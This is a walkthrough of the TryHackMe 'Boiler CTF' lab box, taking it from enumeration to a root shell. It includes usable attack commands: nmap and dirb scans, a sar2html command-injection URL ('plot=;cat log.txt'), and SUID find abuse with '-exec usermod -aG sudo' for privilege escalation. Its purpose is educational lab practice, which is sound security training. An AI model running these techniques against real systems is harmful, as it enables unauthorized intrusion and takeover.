BoilerCTF - TryHackMe Walkthrough

Intermediate level CTF. Just enumerate, you’ll get there. This is a TryHackMe box. To access this you must sign up to https://tryhackme.com/.

URL: Boiler CTF

Difficulty: Intermediate

Author: MrSeth6797

This article will primarily be focusing on owning the system, and less focus on answering the questions presented by the challenge. However, most of the answers are found when doing so anyway.

Question 1

We are given the IP 10.10.0.15. Run an nmap scan with the following command:

nmap -p- -A -o portscan 10.10.0.15

I initially got a host down message so I adjusted my nmap command to the following:

nmap -p- -A -Pn -o portscan 10.10.208.159

These are the open ports:

PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.9.6.63
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp    open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
10000/tcp open  http    MiniServ 1.930 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
55007/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e3:ab:e1:39:2d:95:eb:13:55:16:d6:ce:8d:f9:11:e5 (RSA)
|   256 ae:de:f2:bb:b7:8a:00:70:20:74:56:76:25:c0:df:38 (ECDSA)
|_  256 25:25:83:f2:a7:75:8a:a0:46:b2:12:70:04:68:5c:cb (ED25519)

I’d like to explore the FTP server as Anonymous login is allowed. This is always a terrible way to have your FTP server configured as it allows anyone to log in with the default credentials:

ftp 10.10.208.159
Anonymous

There is a hidden file:

ls -la

ls -la

Let’s transfer this over to our local machine

get .info.txt

get

The file seems to contain an encrypted message:

cat info

This seems like a simple letter substitution cypher like Caeser Cypher or Rot 13. I used an online rot13 decryptor:

Rot13

This seems like a rabbit hole. Let’s move onto enumerating the next port.

I’ll open up port 80 on my browser:

port 80

This looks like the standard apache2 page. Let’s run a dirb scan to find any hidden paths:

dirb http://10.10.208.159/

dirb

We’ve got a couple of interesting results: Robots.txt and Joomla. Joomla is a CMS which may be able to provide us with an attack surface.

Let’s investigate the robots.txt file:

robots

Some of these are most likely rabbit holes by the looks of it. It’s important to always explore every path.

All the disallowed paths give a 404 not found error.

A closer look at the following code:

079 084 108 105 077 068 089 050 077 071 078 107 079 084 086 104 090 071 086 104 077 122 073 051 089 122 085 048 077 084 103 121 089 109 070 104 078 084 069 049 079 068 081 075

This is ASCII, you can convert to base64, md5 but again it’s another rabbit hole.

Here is the /joomla repository:

joomla

I want to run a dirb scan on this url to find more information:

dirb http://10.10.208.159/joomla/

dirb joomla

There are a few rabbit holes again:

_archive/

archive

_database/

database

This is a Caeser Cypher, using a key of 2:

Just messing around.

_files/

files

From base64:

Whopsie daisy.

_test/

test

Here we are presented with a sar2html tool. I searched this up online and found an exploit.

Here is an exploitDB page on an RCE exploit:

Exploit DB

We can execute our own command using the URL:

/index.php?plot=;<command-here>

Then “press “select # host” then your command’s output will appear bottom side of the scroll screen.”

I have entered “id” into the url:

10.10.208.159/joomla/_test/index.php?plot=;id

id

The RCE has been proven to work. There is a file called log.txt. Executing this URL will show the contents of log.txt:

http://10.10.208.159/joomla/_test/index.php?plot=;cat log.txt

cat log.txt

Question 2

This has given us a username and password (censored). Let’s use this to connect by SSH. As we identified earlier, the port 55007 is open for SSH so we need to specify this port when connecting via SSH:

ssh [email protected] -p 55007

ssh

Upgrade the shell with the following command:

python -c 'import pty; pty.spawn("/bin/bash")'

There is a script in the current directory called backup.sh:

script

There are credentials for the user “stoner” in plain text.

USER=stoner
#s********************s

Let’s change to this user:

su stoner
[censored]

su

We have some hidden files in stoners home directory /home/stoner:

home

The .nano is empty and .secret is the user.txt file. I spent a while looking for an actual file called user.txt but turns out it’s this.

Let’s check sudo rights:

sudo -l

sudo l

User stoner may run the following commands on Vulnerable:
(root) NOPASSWD: /NotThisTime/MessinWithYa

No that helpful as this path doesn’t exist and we don’t have permission to create this directory.

The next method I usually go for is finding any interesting SUID binaries. This is a great article about SUID Binaries:

SUID Binaries

Here is the following command to list all SUID binaries on the system:

find / -user root -perm -4000 -print 2>/dev/null

suid find

I understand that “/usr/bin/find” can be exploited.

Privilege Escalation Using Find SUID Binary

The exploitation of this binary is quite straight forward. We can use the command “find” with sudo rights. Let’s create a dummy file called cybergoat.txt in stoners home directory:

touch cybergoat.txt

And let’s use the following command to “find” that file and execute our own command:

find raj -exec "whoami" \;

whoami

That’s great, we have successfully executed whoami as root. The following command adds a user to the Sudo Group on Linux:

usermod -aG sudo [user]

So let’s add that into the find command:

find cybergoat.txt -exec usermod -aG sudo stoner \;
su stoner

sudo

As you can see, we can execute any command as sudo. Now we can get a root shell and find the last flag:

sudo /bin/bash
cd /root
cat root.txt

root

Written on June 8, 2020